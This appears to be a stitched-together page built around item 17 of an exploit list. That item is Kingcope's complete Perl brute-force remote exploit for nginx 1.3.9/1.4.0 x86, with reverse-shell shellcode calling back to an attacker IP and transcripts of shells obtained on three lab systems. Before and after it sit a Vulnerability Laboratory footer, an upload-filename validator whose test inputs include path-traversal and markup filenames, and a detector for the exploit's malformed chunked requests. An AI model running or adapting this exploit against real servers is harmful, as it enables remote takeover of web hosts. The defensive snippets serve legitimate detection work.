Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com
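The three listing rows in the proof of concept show the same root cause from three angles: the client chooses a path in the filename, stacks several extensions on one name, and gets markup in the name echoed back into the index listing. The following is an added defensive example, not code from the Vulnerability Laboratory advisory or from the Air Drive Plus application: a hypothetical upload handler that validates the client filename against an allow-list, lets the server pick the on-disk name, confines the resolved path to the upload directory, and HTML-escapes names before rendering the listing. The extension set, the upload directory and the sample filenames are assumed or constructed for the example.

```python
import html
import os
import re
import secrets

# Assumed policy for a hypothetical upload endpoint (not values from the advisory or the app).
ALLOWED_EXTENSIONS = {"png", "gif", "jpg", "jpeg", "pdf", "txt"}
UPLOAD_DIR = "/var/tmp/example-uploads"            # placeholder upload root
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # what the client may put before the dot


def validate_upload_filename(filename: str):
    """Return (True, "ok") or (False, reason) for a client-supplied filename.

    The client never gets to choose a directory, a second extension, or
    markup characters; anything outside the allow-list is refused outright.
    """
    if not filename or len(filename) > 255:
        return False, "empty or too long"
    if "/" in filename or "\\" in filename or "\x00" in filename:
        return False, "path separator or NUL in filename"
    if filename.startswith("."):
        return False, "hidden or relative filename"
    parts = filename.split(".")
    if len(parts) != 2:
        return False, "exactly one extension required"
    stem, ext = parts
    if not _SAFE_STEM.match(stem):
        return False, "stem contains characters outside [A-Za-z0-9_-]"
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False, "extension ." + ext + " not allowed"
    return True, "ok"


def storage_name_for(filename: str) -> str:
    """Server-chosen on-disk name: a random stem plus the validated extension."""
    ok, reason = validate_upload_filename(filename)
    if not ok:
        raise ValueError(reason)
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(8) + "." + ext


def resolve_under(upload_dir: str, stored_name: str) -> str:
    """Join and confirm the final path is still inside upload_dir (defence in depth)."""
    root = os.path.realpath(upload_dir)
    path = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("resolved path escapes upload directory")
    return path


def render_listing_row(display_name: str) -> str:
    """Escape the original name before echoing it into the HTML index listing."""
    return "<td>" + html.escape(display_name, quote=True) + "</td>"


if __name__ == "__main__":
    # Constructed inputs: the filenames the advisory's listing shows, plus a benign one.
    for name in ("photo.png", ";/private/var/mobile/Applications/1337.png",
                 "1337.png.gif.php.js.html", "<i>1337.png"):
        print(repr(name), "->", validate_upload_filename(name))
    print(resolve_under(UPLOAD_DIR, storage_name_for("photo.png")))
    print(render_listing_row("<i>1337.png"))
```

The validator rejects rather than sanitises: a name with a separator or several dots is refused instead of being rewritten, because rewriting is where bypasses live. The stored name is generated server-side, so even a name that passes validation never decides where the file lands, and the realpath check catches a mistake elsewhere in the handler.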
  17. Description: nginx version 1.3.9 and 1.4.0 x86 brute force proof of concept remote exploit that spawns a reverse shell.
      Author: Kingcope
      Source: nginx 1.3.9 / 1.4.0 x86 Brute Force Proof Of Concept ≈ Packet Storm
      Code:

#nginx 1.3.9/1.4.0 x86 brute force remote exploit
# copyright (c) 2013 kingcope
#----------------------------
#fix for internet exploitation, set MTU:
#ifconfig <interface> mtu 60000 up
#
###
# !!! WARNING !!!
# this exploit is unlikely to succeed when used against remote internet hosts.
# the reason is that nginx uses a non-blocking read() at the remote connection,
# this makes exploitation of targets on the internet highly unreliable.
# (it has been tested against a testbed on the internet but I couldn't exploit
# any other box with it. required was the above ifconfig setting on the client.
# maybe enabling large tcp frame support on a gigabit connection is more
# useful)
# so use it inside intranets only (duh!), this remains a PoC for now
# The exploit does not break stack cookies but makes use of a reliable method
# to retrieve all needed offsets for Linux x86 and pop a shell.
###
#TODO
#*cleanup code
#*implement stack cookie break and amd64 support
#*support proxy_pass directive
###

=for comment

TARGET TESTS (Debian, Centos, OpenSuSE)

1. Debian 7

perl ngxunlock.pl 192.168.27.146 80 192.168.27.146 443
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align % SEGV %
testing 5182 align % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align % SEGV %
testing 5182 align % SEGV %
Finding write offset, determining exact align
testing 0x08049c50, 5184 align % SURVIVED %
Extracting memory \
bin search done, read 20480 bytes
exact align found 5184
Finding exact library addresses
trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80 % FOUND exact ioctl 0x08049a30 %
trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890 % FOUND exact memset 0x08049ce0 %
trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40 % FOUND exact mmap64 0x08049d50 %
Found library offsets, determining mnemonics
trying 0x0804ed2d % SURVIVED %
exact large pop ret 0x0804a7eb
exact pop x3 ret 0x0804a7ee
bin search done |
See reverse handler for success

nc -v -l -p 443
listening on [any] 443 ...
192.168.27.146: inverse host lookup failed: Unknown host
connect to [192.168.27.146] from (UNKNOWN) [192.168.27.146] 34778
uname -a;id;
Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
cat /etc/debian_version
7.1

2. CentOS 6.4

perl ngxunlock.pl 192.168.27.129 80 192.168.27.129 443
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align % SEGV %
testing 5194 align % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align % SEGV %
testing 5194 align % SEGV %
Finding write offset, determining exact align
testing 0x08049990, 5200 align % SURVIVED %
Extracting memory /
bin search done, read 20480 bytes
exact align found 5200
Finding exact library addresses
trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0 % FOUND exact memset 0x080499f0 %
trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0 % FOUND exact ioctl 0x08049b50 %
trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0 % FOUND exact mmap64 0x08049f10 %
Found library offsets, determining mnemonics
trying 0x0804e9d4 % SURVIVED %
exact large pop ret 0x0806194d
exact pop x3 ret 0x0804a832
bin search done /
See reverse handler for success

nc -v -l 443
Connection from 192.168.27.129 port 443 [tcp/https] accepted
uname -a;id;
Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
cat /etc/redhat*
CentOS release 6.4 (Final)

3. OpenSuSE 12.1

perl ngxunlock.pl 192.168.27.135 80 192.168.27.135 443
Testing if remote httpd is vulnerable % SEGV %
YES %
Finding align distance (estimate)
testing 5250 align % SEGV %
testing 5182 align % SEGV %
Verifying align
Finding align distance (estimate)
testing 5250 align % SEGV %
testing 5182 align % SEGV %
Finding write offset, determining exact align
testing 0x08049a18, 5184 align % SURVIVED %
Extracting memory \
bin search done, read 20480 bytes
exact align found 5184
Finding exact library addresses
trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0 % FOUND exact memset 0x08049a68 %
trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160 % FOUND exact ioctl 0x08049b88 %
trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0 % FOUND exact mmap64 0x08049ee8 %
Found library offsets, determining mnemonics
trying 0x0804ea7f % SURVIVED %
exact large pop ret 0x0804a7fa
exact pop x3 ret 0x0804a101
bin search done -
See reverse handler for success

Connection from 192.168.27.135 port 443 [tcp/https] accepted
uname -a;id;
Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux
uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup)
cat /etc/SuSE-*
openSUSE
VERSION = 12.1
openSUSE 12.1 (i586)
VERSION = 12.1
CODENAME = Asparagus

=cut

use IO::Socket;

if ($#ARGV < 3) {
	print "nginx remote exploit\n";
	print "copyright (c) 2013 kingcope\n";
	print "usage: $0 <target> <target port> <reverse ip> <reverse port>\n";
	exit;
}

$target = $ARGV[0];
$targetport = $ARGV[1];
$cbip = $ARGV[2];
$cbport = $ARGV[3];

#linux reverse shell by bighawk
$lnxcbsc = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90\x6a\x66\x58\x6a\x01\x5b"
."\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x68"
."\x7f\x7f\x7f\x7f" # IP
."\x66\x68" .
"\xb0\xef" # PORT ."\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x6a\x03\x5b\x6a\x66" ."\x58\xcd\x80\x87\xf3\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x31\xd2" ."\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); substr($lnxcbsc, 31, 4, $a1 . $a2 . $a3 . $a4); ($p1, $p2) = split(//, reverse(pack("s", $cbport))); $p1 = chr(ord($p1)); $p2 = chr(ord($p2)); substr($lnxcbsc, 37, 2, $p1 . $p2); $|=1; $uri=""; ###test target vulnerable #XXX #$k = 0x80498d0; #$align2 = 5200; #$alignplus=0; #goto debug; print "Testing if remote httpd is vulnerable "; $uritested = 0; test: goto l; connecterr: if ($j==0) { print "\nDestination host unreachable\n"; exit; } goto again; l: for ($j=0;$j<15;$j++) { again: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto connecterr}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: close\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); twinkle(); print $sock $req; send($sock, "A" x (5555-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); close($sock); twinkle(); if ($buffer =~ /HTTP\/1.1/) { next; } if ($l <= 0) { print "% SEGV %\n"; print "YES %\n"; goto yes; } } if ($uritested == 0) { $uri = "50x.html"; $uritested=1; goto test; } print "\n\\\\ NO %\n"; print "\\\\ Try to increase client MTU with ifconfig <interface> mtu 60000 up\n\n\\\\ Debug output\n"; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto connecterr}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "GET / HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . 
"8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x (5555-1024) . $stack, MSG_OOB); $line = 0; while(<$sock>) { print; if ($line > 30) { last; } } exit; ###find align $verifyalign = 0; yes: print "Finding align distance (estimate)\n"; for ($align=4050;$align<6000;$align+=100) { for ($j=0;$j<15;$j++) { printf("testing %d align ",$align); again0_1: # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again0_1}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again0_1}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x ($align-1024) . 
$stack, MSG_OOB); $l = read($sock, $buffer, 0x10); twinkle(); close($sock); if ($l <= 0) { if ($align == 4050) { goto out; } print " % SEGV %\n"; $alignstart = $align-100; goto incalign; } print "\r\r\r\r"; if ($buffer =~ /HTTP\/1.1/) { next; } close($sock); } } out: print "\n\\\\ Align not found\n"; exit; incalign: for ($align=$alignstart;$align<6000;$align++) { for ($j=0;$j<7;$j++) { printf("testing %d align ",$align); again0_2: # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again0_2}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again0_2}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", 0xc0debabe); print $sock $req; send($sock, "A" x ($align-1024) . $stack, MSG_OOB); $l = read($sock, $buffer, 0x10); twinkle(); close($sock); if ($l <= 0) { print " % SEGV %\n"; if ($verifyalign == 0) { print "Verifying align\n"; $verifyalign = $align; goto yes; } if (($align > $verifyalign + 4) || ($align < $verifyalign - 4)) { print "\\\\ Align and verfied align do not match\n"; exit; } if ($verifyalign < $align) { $align = $verifyalign; } goto begin; } print "\r\r\r\r"; if ($buffer =~ /HTTP\/1.1/) { next; } close($sock); } } print "\n\\\\ could not find align value. 
bailing out"; exit; ###find write offset begin: print "Finding write offset, determining exact align\n"; $align2 = $align; $ok = 0; #for ($k=0x8049d30;$k<=0x0804FFFF;$k+=4) { for ($k=0x08049800;$k<=0x0804FFFF;$k+=4) { #for ($k=0x0804dc00;$k<=0x0804FFFF;$k+=4) { for ($alignplus=0;$alignplus<7;$alignplus++) { debug: for ($j=0;$j<10;$j++) { if (pack("V", $k) =~ /\x20/) { next; } $align = $align2 + $alignplus; printf("testing 0x%08x, %d align ",$k,$align); again1: # if ($ok==0) { # $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => $targetport, # Proto => 'tcp') || {goto again1}; # setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); # $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" # ."Connection: close\r\n\r\n"; # print $sock $req; # close($sock); # } $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again1}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; # $k = 0x8049e30; #XXX $stack = pack("V", $k) # write plt assumed,eg 0x804ab6c . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $k-0x1000) # write buffer . "\xff\xff\xf0\x00"; # write size #$p = <stdin>; print $sock $req; if ($ok == 0) { send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); } else { send($sock, "A" x ($align-1024) . $stack . 
"A" x 500, MSG_OOB); } $l = read($sock, $buffer, 0x5000); twinkle(); close($sock); #0x8049c50 if ($buffer =~ /HTTP\/1.1/) { if ($ok == 0) { print "\r\r\r\r"; next; } else { goto again1; } } if ($ok == 1 && length($buffer) < 0x2000) { goto again1; } if (length($buffer) > 350) { if ($ok == 0) { $ok = 1; print " % SURVIVED %\n"; print("Extracting memory "); goto again1; } print "\nbin search done, "; printf("read %d bytes\n", $l); goto hit; } print "\r\r\r\r"; } } } print "\n\\\\unable to get write offset\n"; exit; hit: printf("exact align found %d\n", $align); print "Finding exact library addresses\n"; $write = $k; $writeless = $write-0x1000; ### find offsets for mmap64, memset and ioctl $mmap64 = ""; $ioctl = ""; $memset = ""; $mmap64_prefix = "\x55\x53\x56\x57\x8b\x54\x24\x28" ."\x8b\x4c\x24\x2c\xf7\xc2\xff\x0f" ."\x00\x00\x75"; $ioctl_prefix = "\x53\x8b\x54\x24\x10\x8b\x4c\x24" ."\x0c\x8b\x5c\x24\x08\xb8\x36\x00" ."\x00\x00"; $memset_prefix = "\x53\x8b\x4c\x24\x10\x0f\xb6\x44" ."\x24\x0c\x88\xc4\x89\xc2\xc1\xe0" ."\x10\x09\xd0\x8b\x54\x24\x08\x83"; $memset_prefix2 = "\xfc\x57\x8b\x54\x24\x08\x8b\x4c" ."\x24\x10\x0f\xb6\x44\x24\x0c\xe3" ."\x2c\x89\xd7\x83\xe2\x03\x74\x11"; $memset_prefix3 = "\x57\x8b\x7c\x24\x08\x8b\x54\x24" ."\x10\x8a\x44\x24\x0c\x88\xc4\x89" ."\xc1\xc1\xe0\x10\x66\x89\xc8\xfc"; $memset_prefix4 = "\x55\x89\xe5\x57\x56\x83\xec\x04". "\x8b\x75\x08\x0f\xb6\x55\x0c\x8b". 
"\x4d\x10\x89\xf7\x89\xd0\xfc\x83"; $buffer2 = $buffer; $buffer3 = $buffer; plt_again: $buffer2 = $buffer3; for( { $i = index($buffer2, "\xff\x25"); if ($i >= 0) { if (($j = index($buffer3, substr($buffer2, $i, 50))) <= 0) { $buffer2 = substr($buffer2, $i+2); next; } $buffer2 = substr($buffer2, $i+2); $address = $writeless + $j; ### delve into library function printf "trying plt 0x%08x, ", ($address+2); again2: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again2}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $address+2) # write buffer . "\x00\x03\x00\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); $l = read($sock, $buffer, 0x300); if ($buffer =~ /HTTP\/1.1/) { goto again2; } if ($l == 0x300) { $gotentry = unpack("V", substr($buffer,0,4)); if ($gotentry == 0) { print "\r\r\r\r"; next; } close($sock); } else { close($sock); goto again2; } printf "got 0x%08x, ", $gotentry; again3: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again3}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $gotentry) # write buffer . "\x00\x03\x00\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . 
"A" x 1000, MSG_OOB); $l = read($sock, $buffer, 0x300); close($sock); if ($buffer =~ /HTTP\/1.1/) { goto again3; } if ($l == 0x300) { $function = unpack("V", substr($buffer,0,4)); } else { goto again3; } if ($function == 0) { print "\r\r\r\r"; next; } printf "function 0x%08x ", $function; again4: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again4}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $write) # write plt . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $function) # write buffer . "\xff\xff\xf0\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); #$p = <stdin>; $l = read($sock, $buffer, 0x500); close($sock); if ($buffer =~ /HTTP\/1.1/) { goto again4; } if ($l != 0x500) { goto again4; } ### if (substr($buffer, 0, length($mmap64_prefix)) eq $mmap64_prefix) { $mmap64 = $address; printf(" %% FOUND exact mmap64 0x%08x %%\n", $mmap64); } if ((substr($buffer, 0, length($memset_prefix)) eq $memset_prefix) or (substr($buffer, 0, length($memset_prefix2)) eq $memset_prefix2) or (substr($buffer, 0, length($memset_prefix3)) eq $memset_prefix3) or (substr($buffer, 0, length($memset_prefix4)) eq $memset_prefix4)) { $memset = $address; printf(" %% FOUND exact memset 0x%08x %%\n", $memset); } if (substr($buffer, 0, length($ioctl_prefix)) eq $ioctl_prefix) { $ioctl = $address; printf(" %% FOUND exact ioctl 0x%08x %%\n", $ioctl); } if (($mmap64 ne "") and ($memset ne "") and ($ioctl ne "")) { goto gotplt; } print "\r\r\r\r"; } else { last; } } print "\nFinding exact library addresses\n"; goto plt_again; gotplt: print "Found library offsets, determining mnemonics\n"; ### find pop pop pop ret ### to set socket blocking for ($k=$write + 
0x5000;;$k++) { printf("trying 0x%08x ",$k); again5: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again5}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: keep-alive\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $ioctl) . pack("V", $k) # pop pop pop ret assumed . "\x03\x00\x00\x00" . "\x21\x54\x00\x00" . "\x08\x80\x04\x08" # null byte . pack("V", $write) # write plt found . "ZZZZ" # crash dummy . "\x03\x00\x00\x00" # write file descriptor . pack("V", $write) # write buffer . "\xff\xff\x0f\x00"; # write size print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); #$p = <stdin>; $l = read($sock, $buffer, 0xfffff); close($sock); twinkle(); if ($buffer =~ /HTTP\/1.1/) { again5; } if ($l > 0xfff) { print " % SURVIVED %\n"; close($sock); goto hit2; } print "\r\r\r\r"; next; } hit2: ###send attack buffer ###find largepopret @matches = $buffer =~ /(\x83\xc4\x20[\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d]\xc3)/g; foreach $m (@matches) { $i = index($buffer, $m); twinkle(); print "\r"; if ($i >= 0) { $__largepopret = $write + $i; printf("exact large pop ret 0x%08x\n", $__largepopret); goto hit3; } } print "\\\\ large pop ret not found\n"; exit; hit3: ###find poppoppopret @matches = $buffer =~ /([\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d][\x58\x5b\x59\x5a\x5e\x5f\x5d]\xc3)/g; foreach $m (@matches) { $i = index($buffer, $m); if ($i >= 0) { $__poppoppopret = $write + $i; printf("exact pop x3 ret 0x%08x\n", $__poppoppopret); goto attack; } } print "\\\\ poppoppopret not found\n"; exit; attack: $largepopret = pack("V", $__largepopret); $popblock = "\x00\x00\x00\x00" ."\x00\x00\x00\x00" ."\x00\x00\x00\x00" ."\x00\x00\x00\x00"; $popret = pack("V", $__poppoppopret+2); $poppoppopret = pack("V", 
$__poppoppopret); $pop3ret = $__poppoppopret; $copycode = "\xfc\x8b\xf4\xbf\x00\x01\x00\x10\xb9\x00\x02\x00\x00\xf3\xa4" ."\xeb\xff"; $memsetcode = ""; $copyaddress = 0x10000000; for ($i=0;$i<length($copycode);$i++) { $byte = substr($copycode, $i, 1); $memsetcode .= pack("V", $memset) . pack("V", $pop3ret) . pack("V", $copyaddress) . $byte . "\x00\x00\x00" . "\x01\x00\x00\x00"; $copyaddress++; } for ($q=0;$q<10;$q++) { print "bin search done "; sleep(1); twinkle(); print "\r" } print "\n"; print "See reverse handler for success\n"; again6: $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $targetport, Proto => 'tcp') || {goto again6}; setsockopt($sock, SOL_SOCKET, SO_SNDBUF, 60000); $req = "HEAD /$uri HTTP/1.1\r\nHost: $target\r\n" ."Connection: close\r\n" ."Transfer-Encoding:chunked\r\n\r\n"; $req .= "0" x (1024-length($req)-16) . "8000000000003770"; $stack = pack("V", $mmap64) . $largepopret ."\x00\x00\x00\x10" # mmap start ."\x00\x10\x00\x00" # mmap size ."\x07\x00\x00\x00" # mmap prot ."\x32\x00\x00\x00" # mmap flags ."\xff\xff\xff\xff" # mmap fd ."\x00\x00\x00\x00" # mmap offset ."\x00\x00\x00\x00" # mmap offset . $popblock . $memsetcode . "\x00\x00\x00\x10" # JUMP TO 0x10000000 (rwxp addr) . "\x90" x 100 . $lnxcbsc; #$p = <stdin>; print $sock $req; send($sock, "A" x ($align-1024) . $stack . "A" x 1000, MSG_OOB); close($sock); goto again6; # XXX my $current = 0; sub twinkle { $cursors[0] = "|"; $cursors[1] = "/"; $cursors[2] = "-"; $cursors[3] = "\\"; print "$cursors[$current++]\b"; if ($current > 3) { $current = 0; } }
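Every request the exploit above sends has the same shape: "Transfer-Encoding: chunked", a request padded with zeros to a fixed length, and a 16-hex-digit chunk size ("8000000000003770") with no CRLF after it. A front-end filter or IDS can recognise that shape without knowing anything about the target binary. The following is an added defensive example, not part of Kingcope's exploit or of nginx's own code: it walks the chunked body of a raw HTTP/1.1 request, validates each chunk-size line against a length limit and a maximum chunk size, and returns findings worth logging. The limits and both sample requests are constructed for the example.

```python
import re

# Assumed limits for a front-end filter (example values, not nginx configuration directives).
MAX_CHUNK_SIZE = 16 * 1024 * 1024   # largest single chunk the filter tolerates
MAX_CHUNK_LINE_LEN = 32             # hex digits plus an optional ";ext"; longer lines are suspect
MAX_HEX_DIGITS = 15                 # 16 significant hex digits need 64 bits: never a real length

_CHUNK_LINE = re.compile(rb"^([0-9A-Fa-f]+)(?:;[^\r\n]*)?$")


def parse_chunk_size(line: bytes) -> int:
    """Parse one chunk-size line (CRLF already stripped); raise ValueError if malformed or oversized."""
    if len(line) > MAX_CHUNK_LINE_LEN:
        raise ValueError("chunk-size line too long (%d bytes)" % len(line))
    m = _CHUNK_LINE.match(line)
    if not m:
        raise ValueError("chunk-size line is not hex digits")
    digits = m.group(1).lstrip(b"0") or b"0"
    if len(digits) > MAX_HEX_DIGITS:
        raise ValueError("chunk size has %d significant hex digits" % len(digits))
    size = int(digits.decode("ascii"), 16)
    if size > MAX_CHUNK_SIZE:
        raise ValueError("chunk size 0x%x exceeds limit" % size)
    return size


def check_chunk_line(line: bytes) -> str:
    """Convenience wrapper: 'ok' or the reason the line was rejected."""
    try:
        parse_chunk_size(line)
        return "ok"
    except ValueError as exc:
        return str(exc)


def inspect_chunked_request(raw: bytes) -> list:
    """Walk the chunked body of a raw HTTP/1.1 request; return a list of findings (empty = clean)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete request head"]
    chunked = False
    for header in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = header.partition(b":")
        if name.strip().lower() == b"transfer-encoding" and b"chunked" in value.lower():
            chunked = True
    if not chunked:
        return []
    findings = []
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        line = body[pos:] if nl < 0 else body[pos:nl]
        try:
            size = parse_chunk_size(line)
        except ValueError as exc:
            findings.append(str(exc))
            break
        if nl < 0:
            findings.append("chunk-size line not terminated")
            break
        if size == 0:                                 # last-chunk marker
            break
        pos = nl + 2 + size + 2                       # skip CRLF, data, CRLF
        if pos > len(body):
            findings.append("chunk data truncated")
            break
    return findings


# Constructed sample requests: one ordinary upload, one shaped like the exploit's transcript
# (zero padding up to 1024 bytes, then a 16-hex-digit chunk size, no CRLF).
GOOD_REQUEST = (b"POST /upload HTTP/1.1\r\nHost: example.test\r\n"
                b"Transfer-Encoding: chunked\r\n\r\n5\r\nhello\r\n0\r\n\r\n")
_SUSPECT_HEAD = (b"HEAD / HTTP/1.1\r\nHost: example.test\r\nConnection: close\r\n"
                 b"Transfer-Encoding:chunked\r\n\r\n")
SUSPECT_REQUEST = _SUSPECT_HEAD + b"0" * (1024 - len(_SUSPECT_HEAD) - 16) + b"8000000000003770"

if __name__ == "__main__":
    print("good   :", inspect_chunked_request(GOOD_REQUEST))
    print("suspect:", inspect_chunked_request(SUSPECT_REQUEST))
    print("value  :", check_chunk_line(b"8000000000003770"))
```

The length check fires first on purpose: a chunk-size line hundreds of bytes long is already a finding regardless of its numeric value, and the significant-digit test then catches a value that is short but cannot represent a real body length. Both conditions are cheap enough to evaluate in a proxy before the request is forwarded.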
